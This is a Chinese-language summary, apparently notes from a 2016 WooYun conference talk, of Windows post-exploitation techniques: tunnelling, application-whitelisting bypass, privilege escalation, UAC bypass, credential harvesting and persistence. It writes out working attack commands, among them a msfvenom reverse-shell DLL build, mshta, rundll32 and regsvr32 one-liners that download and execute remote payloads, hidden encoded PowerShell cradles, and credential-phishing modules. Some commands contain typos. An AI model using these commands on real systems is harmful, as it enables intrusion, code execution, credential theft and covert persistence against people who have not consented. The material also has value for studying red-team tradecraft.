后渗透阶段常用技术总结 wooyun whitehatfest 2016

小结

后渗透主要行为

• Proxy
• Bypass Application Whitelisting
• Escalate Privileges
• Information Gathering
• Persistence
• Detection and Mitigations

Proxy

端口转发 Client -> lcx, Netsh; HTTP->Tunnel; Metasploit->Portpwd

Socks代理 Client->Ew,Xsocks; HTTP->ReGeorg; Metasploit-> Socks4a

其他 SSH ICMP
VPN

Bypass Application Whitelisting

绕过思路

• HTA
• Office Macro
• Cpl
• Chm
• Powershell
• Rundll32
• Regsvr32
• Regsvcs
• Installutil

HTA

vbscript

mshta.exe vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

javascript

mshta,exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActivaXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScriptShell").Run("cmd /c taskkill /f /im mshta",0,true);}

Office Macro

MacroRaptor
https://bitbucket.org/decalage/oletools/wiki/mraptor

DLL/CPL

生成
payload.dll:
msfvenom -p windows/meterpreter/reverse_tcp -b ‘\x00\xff’ lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

http://drops.wooyun.org/tips/16042

(1) 直接运行dll: rundll32 shell32.dll,Control_RunDLL payload.dll
(2) 将dll重命名成cpl，双击运行
(3) 普通的dll直接改后缀名

Chm

高级组合技巧打造完美捆绑后门
http://drops.wooyun.org/tips/14254

利用系统 CHM 实现隐蔽后门：
《那些年我们玩过的奇技淫巧》

Powershell

Command

powershell -nop -exec bypass -c IEX(New-Object.WebClient).DownloadString("http://ip:port")
Get-Content payload.ps1 | iex
cmd.exe /K <payload.bat>

Lnk

powershell -nop -windows -hidden -E YwBhAGwAYwAuAGUAeABIAA==

如果禁用powershell

• 通过.Net 执行 powershell
  http://blog.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/

• p0wnedShell
  https://github.com/Cn33liz/p0wnedShell

• PowerOPS
  https://labs.portcullis.co.uk/blog/powerops-powershell-for-offensive-operations/

Rundll32

JavaScript

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();new%20ActiveObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://ip.port');")

DLL

rundll32 shell32.dll,Control_RunDLL payload.dll

http://drops.wooyun.org/tips/11764

Regsvr32

三种启动方式

regsvr32 /u /n /s /i:padload.sct scrobj.dll

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

右键注册

http://subt0x10.blogspot.jp/2016/04/bypass-application-whitelisting-script.html

http://drops.wooyun.org/tips/15124

Regsvcs

https://gist.github.com/subTee/e1c54e1fdafc15674c9a

Installutil

编译

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe/platform:x64/out:InstallUtil.exe InstallUtil.cs

InstallUtil.exe /U InstallUtil.exe

http://subt0x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html

http://drops.wooyun.org/tips/8862

可执行目录

通过ps 脚本扫描可写入的路径

http://go.mssec.se/AppLockerBC

Escalation

常见提权方式

• 本地提权漏洞
• 服务提权
• 协议
• phishing

本地提权

根据补丁号来确定是否存在漏洞的脚本
https://github.com/GDSSecurity/Windows-Exploit-Suggester
将victim计算机的systeminfo导出到文件
Systeminfo>1.txt
使用脚本判断存在的漏洞
python windows/exploit-suggester.py –database 2016-05-31mssb.xls –systeminfo ~/Desktop/1.txt

可能遇到exp被杀的问题

将exp改成powershell

http://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html

服务提权

常用服务: mssql,mysql,oracle,ftp
第三方服务: dll hijacking, file hijacking

提权脚本powerup
https://drops.wooyun.org/tips/11989

协议提权

利用已知的windows问题，以获得本地权限提升 -> Potato
其利用NTLM中继(特别时基于HTTP > SMB中继)和 NBNS 欺骗进行提权

http://tools.pwn.ren/2016/01/17/patato-windows.html

phishing

msf ask 模块

exploit/windows/local/ask

通过runas方式来诱导用户通过点击uac验证来获取最高权限

需要修改的msf脚本
metasploit/lib/msf/core/post/windows/runas.rb

Information Gathering

LaZagne
mstsc记录
浏览器历史记录
本机用户密码
本机 WiFi ssid 以及 WiFi密码
本机最近操作文件
本机System info
证书!
Installed Programs: Startup Items
Installed Services: Security Services File/Printer Shares DatabaseServers Cerificate Authority
Sensitive Data: Key-logging Screen capture Network traffic
User Information
System Configuration: Password Policy Security Policies Configured Wireless Network and keys

键盘记录
屏幕录像
Netripper

phishing密码
通过脚本弹出认证窗口
https://github.com/Ridter/Pentest/blob/master/note/Powershell_MSFCapture.md

msf模块
post/windows/gather/phish_windows_credentials

Bypass UAC

• 使用 IFileOperation COM 接口
• 使用 Wusa.exe extract
• 远程注入shellcode 傀儡进程
• DLL劫持，劫持系统DLL文件
• 直接提权过UAC
• Phishing http://evi1cg.me/archives/Powershell_Bypass_UAC.html
• http://www.powershellempire.com/?page_id=380

无文件攻击

powershell

jsrat

mshta

sct

wsc

Persistence

• 启动项
• 注册表
• wmi
• at
• schtasks
• 劫持已有的第三方服务
• bitsadmin

Detection

bitsadmin /list /allusers /verbose

Stop Background Intelligent Transfer Service

参考资料

乌云白帽大会 2016 ShellIsOnlyTheBeginning 3gstudent evi1cg